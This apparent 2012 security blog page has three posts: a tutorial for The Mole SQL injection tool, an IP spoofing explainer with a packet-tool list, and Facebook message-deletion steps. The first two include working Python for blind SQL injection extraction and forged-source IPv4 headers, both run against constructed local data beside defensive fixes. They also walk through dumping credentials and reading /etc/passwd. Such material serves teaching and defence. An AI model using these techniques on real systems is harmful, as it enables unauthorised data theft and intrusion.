

Friday, April 6, 2012

The Mole automatic SQL Injection exploitation tool

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.


Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Exploits SQL Injections through GET/POST/Cookie parameters.
Developed in Python 3.
Exploits SQL Injections that return binary data.
Powerful command interpreter to simplify its usage.

Disclaimer: Usage of The Mole for attacking web servers without mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.


In this tutorial, you will learn how to use The Mole to exploit SQL Injections, extracting data from the database and reading files from the vulnerable server.
For a complete reference of The Mole's commands and how to use them, see the guide written by Sébastien Damaye (thanks for writing such a complete guide!).

If you happen to encounter some problem when exploiting an SQL Injection, caused by some filter or IPS used by the target server, please visit our filters tutorial.

Before we start, you must know what is required in order to exploit a SQL Injection using The Mole. Once you have found a vulnerable script, you have to find a string (the "needle") which normally appears in the web page, but does not appear when you negate the query being executed on the database (by modifying the vulnerable parameter, for example appending "and 1=2" to it).

Identifying the injection

This example will be shown using this test site:

Okay, assuming we don't know there's a SQL Injection, we will check whether there is one on the parameter "id". We negate the query which will be executed in the database, and look for the string mentioned above.

Fine, we see the string "admin" has disappeared. We will provide this string to The Mole and exploit the injection.
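The needle test above is the whole basis of The Mole's boolean technique: a condition appended to the vulnerable parameter is true if the needle is still on the page and false if it is gone, and that one bit per request is enough to read the database. The following is an added example written for this page, not code from The Mole; it replaces the test site with a constructed in-memory SQLite table (the "users" table with id, username and password from later in the tutorial, holding the made-up credential md5("admin")) and a deliberately vulnerable page function, then runs the needle check and a character-by-character blind extraction against it, and finally shows that the same check fails against a parameterised version of the page. The SQL functions used (length, substr, unicode) are SQLite's; MySQL spells the last two substring and ascii.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for the tutorial's test site: a "users"
# table with id, username and password columns, as in the tutorial's dump.
ADMIN_HASH = hashlib.md5(b"admin").hexdigest()  # constructed credential, md5("admin")


def build_db():
    """In-memory SQLite database playing the role of the site's back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", ADMIN_HASH), (2, "bob", hashlib.md5(b"bob").hexdigest())],
    )
    return conn


def vulnerable_page(conn, id_param):
    """Deliberately vulnerable: the id parameter is pasted into the SQL text."""
    sql = f"SELECT username FROM users WHERE id={id_param}"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        rows = []  # the site swallows SQL errors and shows an empty list
    return "<ul>" + "".join(f"<li>{row[0]}</li>" for row in rows) + "</ul>"


def hardened_page(conn, id_param):
    """Same page, fixed: the parameter is validated and bound, never concatenated."""
    try:
        id_value = int(id_param)
    except ValueError:
        return "<p>bad request</p>"
    rows = conn.execute("SELECT username FROM users WHERE id=?", (id_value,)).fetchall()
    return "<ul>" + "".join(f"<li>{row[0]}</li>" for row in rows) + "</ul>"


def make_fetch(page, conn):
    """Returns a fetch(id_value) -> html function plus a one-element request counter."""
    sent = [0]

    def fetch(id_value):
        sent[0] += 1
        return page(conn, id_value)

    return fetch, sent


def detect_boolean_injection(fetch, base_value, needle):
    """The tutorial's needle test: the needle is on the normal page, survives an
    always-true condition, and disappears when the query is negated."""
    return (needle in fetch(base_value)
            and needle in fetch(f"{base_value} AND 1=1")
            and needle not in fetch(f"{base_value} AND 1=2"))


def ask(fetch, base_value, needle, condition):
    """One boolean question to the database: True iff the needle is still shown."""
    return needle in fetch(f"{base_value} AND ({condition})")


def blind_int(fetch, base_value, needle, expr, lo, hi):
    """Binary-search the integer value of a SQL expression known to lie in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(fetch, base_value, needle, f"({expr})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(fetch, base_value, needle, expr, max_len=64):
    """Extract a string expression character by character through the needle.
    unicode()/substr()/length() are SQLite's names; MySQL uses ascii()/substring()."""
    length = blind_int(fetch, base_value, needle, f"length({expr})", 0, max_len)
    return "".join(
        chr(blind_int(fetch, base_value, needle, f"unicode(substr({expr},{i},1))", 0, 127))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    conn = build_db()
    fetch, sent = make_fetch(vulnerable_page, conn)
    print("injectable:", detect_boolean_injection(fetch, "1", "admin"))
    secret = "(SELECT password FROM users WHERE username='admin')"
    print("admin hash:", blind_string(fetch, "1", "admin", secret), "after", sent[0], "requests")
    safe_fetch, _ = make_fetch(hardened_page, conn)
    print("hardened page injectable:", detect_boolean_injection(safe_fetch, "1", "admin"))
```

The request counter is the point of the binary search: a 32-character hash costs roughly 7 requests per character plus a handful for the length, which is why the tutorial warns that enumerating every table name blindly is slow and why a union injection, which returns whole rows per request, is preferred whenever the page allows it.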

Exploiting the injection

First of all, we execute The Mole using the parameter "-u" to indicate which URL we will be using, and "-n" to indicate the needle/string. Our command should look like this:

./ -u '' -n 'admin'

The mole will start and give us a prompt:

Notice that by default, the last parameter on the URL is used as the vulnerable parameter. If you want to specify another parameter as the vulnerable one, you can use the "-p" command line argument, or use the "injectable_field" command.

Windows users

Windows users should be aware that when using the "-u" command line argument, the "&" characters have to be escaped manually using the "^" character. Therefore, if the URL has two parameters, it should look like this:
mole.exe -u^&id=1 -n 'admin'

You can also set the URL by using the "url" command, so you can paste the URL without quoting it. The needle can also be set using the "needle" command.
Okay, we are ready to go. First of all, we want to know which databases are available on the system. The command "schemas" will dump their names.

The Mole has done two things here:

Find exploitation parameters, such as the number of columns, the comment sequence to be used, the back-end database, the number of parentheses, etc.
Once it has been initialized, it dumps the database names, using back-end database specific queries.
Note that the initialization phase is done only once. Moving on, we will dump the tables in the "test" database. The "tables" command does that, and requires the database name as its argument:

Great ! There's a "users" table! Now we need to find the columns of that table. The "columns" command requires the name of the database and table name as its arguments.

We see 3 columns, id, username and password. Now it's time to dump those hashes :D. The "query" command requires the database name, the table name, and a list of comma-separated columns to dump. Alternatively, you could use '*' in the columns field, but we don't want to dump the "id" column right now, so we will do it manually. Remember that The Mole provides nice autocompletion features, so the database, table and column names will be autocompleted whenever you press the TAB key.

Nice! We've got the administrator's credentials. However, when we dumped the database names, we could see "mysql", and being able to read that database usually means the application connects with a highly privileged account, possibly root. Let's find out by using the "dbinfo" command, which will dump the database user, name and version.

Ha, thought so, we have root privileges. Okay, let's try reading a file by using the "readfile" command, which expects the filename to be read as its argument. We will read /etc/passwd as an example. Note that reading files through MySQL requires the FILE privilege and, on servers where secure_file_priv is set, only works for paths under that directory, so root is a good sign but not a guarantee.

Okay, now we move on to the handy commands which will make things faster. Imagine we don't know which tables exist in the "mysql" database. In this case the injection goes quite fast, since it can be exploited through the union technique; however, Blind SQL Injections are pretty common, and in that case dumping the name of every table in a certain database can be quite slow. Here we will use the "find_users_table" command, which tries to find a table in a certain database which "looks like" it might contain usernames and passwords (based on its name). Note that this command does not use any metadata database/table, such as information_schema.tables, so it can be used in scenarios where the back-end database is a MySQL < 5, which does not have the information_schema database.
This command tests a small built-in list of names; you can alternatively use "find_tables", which tries to find tables using a list provided by you.

As expected, mysql.user exists :D. Now we will use another command which is more useful, but requires information_schema (or whatever the DBMS uses for the same purpose) to exist. The "find_tables_like" command requires a database as its first argument and a pattern as its second, which will be matched against table names. You can use the '%' wildcard, or any other wildcard the back-end database supports. As an example, we will find all tables that contain the substring "ABLE".

Going back to the "query" command, we can use some extra parameters which will be useful under certain situations. We can limit the number of rows to be dumped and/or indicate the first index from which to start the dump(0-index based). This prints only one row, starting from the second index. 
We can also indicate a "where condition", in order to only dump rows which match it.

To sum up, here's a video of The Mole exploiting a SQL Injection, using both union and blind techniques.

That is all right now. This tutorial will be extended soon. Hope you find it useful!


IP Spoofing Introduction and Download Tools

What Is IP Spoofing and How Does It Work?

An IP (Internet Protocol) address identifies your Internet connection on the network. Every host you talk to sees it, it is written into the header of every packet you send, and through your Internet service provider's records it can be traced back to you.

IP spoofing forges the source address field of the IP packets you send, so that the packets appear to come from some other host. It is a common method used by spammers and attackers to impersonate other machines and to mislead others about where the traffic really originated.

How IP Spoofing Works?

The Internet Protocol (IP) carries data between computers on the Internet and on local networks. Every packet carries a header with a source address, which says where the packet came from, and a destination address, which says where it is going.

When IP spoofing is used, the source address in that header is not the real origin. The sender writes a bogus address into the field, so the packet looks as if it was sent by whoever owns that address, and nothing in the protocol itself verifies the claim. Any reply goes to the bogus address rather than to the attacker, so a spoofer only sees responses if they sit on the path to the spoofed address, or can do without them (a flood needs no reply) or can predict them (as in blind TCP sequence-number attacks).

Why IP Spoofing is Used?

IP spoofing is used to commit criminal activity online and to breach network security. Attackers spoof so that spam cannot be traced to them, and to carry out denial of service attacks: floods of packets with random or forged source addresses that exhaust a target's resources and cannot be blocked by source, or reflection attacks in which third-party servers send their replies to the victim whose address was forged. The attacker is hard to catch because the origin recorded in every packet is bogus.

IP spoofing is also used to breach network security where a service trusts clients by their source address alone, such as the old rsh/rlogin host trust or a firewall rule that allows an internal address. By using a bogus IP address that mirrors one of the trusted addresses on the network, the attacker gets past a check that would otherwise require a user name and password.

IP Spoofing Protection

It is possible to protect a network against IP spoofing by using ingress filtering (RFC 2827 / BCP 38): a router drops any packet arriving on an interface whose source address does not belong to the address ranges that legitimately sit behind that interface. This lets the network tell packets that genuinely come from inside a customer's range apart from packets that merely claim to, and egress filtering at the edge applies the same rule to outbound traffic.

The Transmission Control Protocol (TCP) also helps: a connection can only be established or hijacked blindly if the attacker can guess the initial sequence number chosen by the other end, so hosts should use unpredictable, randomised sequence numbers. Disabling IP source routing on routers and hosts removes another avenue, since a source-routed packet lets an attacker steer the replies to a spoofed address back along a path they control.
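To make the two halves of the discussion concrete, here is an added example written for this page (it is not taken from any of the tools listed below): it builds a raw IPv4 header with whatever source address the caller asks for, which is all spoofing amounts to at the packet level, parses it back the way a router would, and then applies a BCP 38 style ingress filter that forwards a packet only if its claimed source belongs to the prefix assigned to the interface it arrived on. The addresses, the prefix and the packets are constructed for the demonstration and use the RFC 5737 documentation ranges; nothing is sent on the wire.

```python
import ipaddress
import struct

# IPv4 header layout: version/IHL, TOS, total length, id, flags/fragment,
# TTL, protocol, header checksum, source address, destination address.
IPV4_HEADER = "!BBHHHBBH4s4s"


def ip_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum of 16-bit words, as used by the IP header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, payload_len, proto=17, ttl=64, ident=0x1234):
    """Build a 20-byte IPv4 header. Nothing here checks that `src` is really ours:
    the sender writes whatever it likes into the source field, which is the whole trick."""
    header = struct.pack(
        IPV4_HEADER, (4 << 4) | 5, 0, 20 + payload_len, ident, 0, ttl, proto, 0,
        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed,
    )
    return header[:10] + struct.pack("!H", ip_checksum(header)) + header[12:]


def parse_ipv4_header(data):
    """Decode the fields a router looks at; None if this is not a sane IPv4 header."""
    if len(data) < 20 or data[0] >> 4 != 4:
        return None
    f = struct.unpack(IPV4_HEADER, data[:20])
    return {
        "src": str(ipaddress.IPv4Address(f[8])),
        "dst": str(ipaddress.IPv4Address(f[9])),
        "ttl": f[5],
        "proto": f[6],
        "checksum_ok": ip_checksum(data[:20]) == 0,  # a correct header sums to zero
    }


def ingress_filter(data, interface_prefixes):
    """BCP 38 / RFC 2827 ingress filtering on a customer-facing interface:
    forward a packet only if its claimed source belongs to a prefix assigned to
    that interface, and never if the source is a bogus or impossible address."""
    pkt = parse_ipv4_header(data)
    if pkt is None or not pkt["checksum_ok"]:
        return False
    src = ipaddress.IPv4Address(pkt["src"])
    if src.is_loopback or src.is_multicast or src.is_unspecified or src.is_reserved:
        return False
    if pkt["src"] == pkt["dst"]:  # LAND-style packet: source equals destination
        return False
    return any(src in ipaddress.IPv4Network(p) for p in interface_prefixes)


if __name__ == "__main__":
    # Constructed sample traffic using RFC 5737 documentation addresses.
    customer = ["203.0.113.0/24"]  # the only prefix the customer interface may source
    genuine = build_ipv4_header("203.0.113.10", "198.51.100.7", 8)
    spoofed = build_ipv4_header("198.51.100.7", "203.0.113.10", 8)  # claims to be someone else
    for name, hdr in [("genuine", genuine), ("spoofed", spoofed)]:
        pkt = parse_ipv4_header(hdr)
        print(f"{name}: src={pkt['src']} dst={pkt['dst']} forward={ingress_filter(hdr, customer)}")
```

The filter can only be applied where the router knows which addresses belong behind an interface, which is at the customer edge; once a spoofed packet has crossed a border that does not filter, the core of the Internet has no way to tell it from a genuine one, which is why the defence has to be deployed by the network the attacker is on rather than by the victim.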

DOWNLOAD pdf Introduction to IP Spoofing

IP spoofing tools

Tools - For Windows

Engage Packet Builder v2.20 - Scriptable packet builder for Windows
HPing v2.0.0 - Command-line oriented TCP/IP packet assembler/analyzer
Nemesis v1.4 beta3 - Command-line portable IP stack
Colasoft Packet Builder v1.0 - Tool for creating custom network packets
Colasoft Packet Player v1.1 - Packet replay tool
PacketExcalibur v1.0.2 - Graphical and scriptable network packet engine
Scapy v2.0.0.10 - Interactive packet manipulation tool
Spoofer v0.5 - IP Spoofing Tester
NMap v4.68 - Utility for network exploration and security auditing

Tools - For Linux

LSRscan v1.0 - Loose Source Route Scanning Tool
Scapy v2.0.0.10 - Interactive packet manipulation tool
Sendip v2.5-1 - Send completely arbitrary packets out over the network
Spoofer v0.5 - IP Spoofing Tester
Yersinia v0.7.1 - Tool to exploit weaknesses in different network protocols
HPing v2.0.0 - Command-line TCP/IP packet assembler/analyzer
IRPAS v0.8 - Internetwork Routing Protocol Attack Suite (File2Cable etc.)
LSRtunnel v0.2.1 - Loose Source Route Tunneling Tool
Nemesis v1.4 beta3 - Command-line portable IP stack
NMap v4.76 - Utility for network exploration and security auditing
PacketExcalibur v1.0.2 - Graphical and scriptable network packet engine



Thursday, April 5, 2012

How to permanently delete message on Facebook

There is one bad thing about Facebook: it does not want to delete anything from its servers, so it has made deletion hard. Deleting your Facebook profile is not straightforward, and messages cannot be deleted directly either; instead there is an option to archive them, so most users archive their Facebook messages in place of deleting them. When you open a message on Facebook, you will only see two options in front of it: "Mark as Unread" and "Archive". So most users think that Archive is the way to delete a message. But all archived messages can easily be accessed again.
If you want to see all the messages you have put in the archive, follow these steps:

Login to your Facebook account.
Go to messages.
Scroll down  the message page and see the links under the label "View". Here you will find a link "Archived".
Click on this link and see the new list of messages.

These are the messages which you have sent to the archive.

There is one more important thing about Facebook messages. Facebook groups all your messages with a person into a single conversation. If you have sent a conversation to the archive, it will no longer appear in the inbox, but it will reappear in the inbox as soon as you have a new conversation with the same person.

So if you really want a message gone, delete it permanently. Sending it to the archive can cause privacy trouble in the future.

Follow these steps to delete the message permanently.

Login to your facebook account.
Now go to messages and see the list of messages.
Here open the message which you want to delete.
Now click on the action button just above the conversation near the conversation search.
Select "Delete Messages" in the drop down menu.
Now this deleted message is no more in your inbox and cannot be recovered.

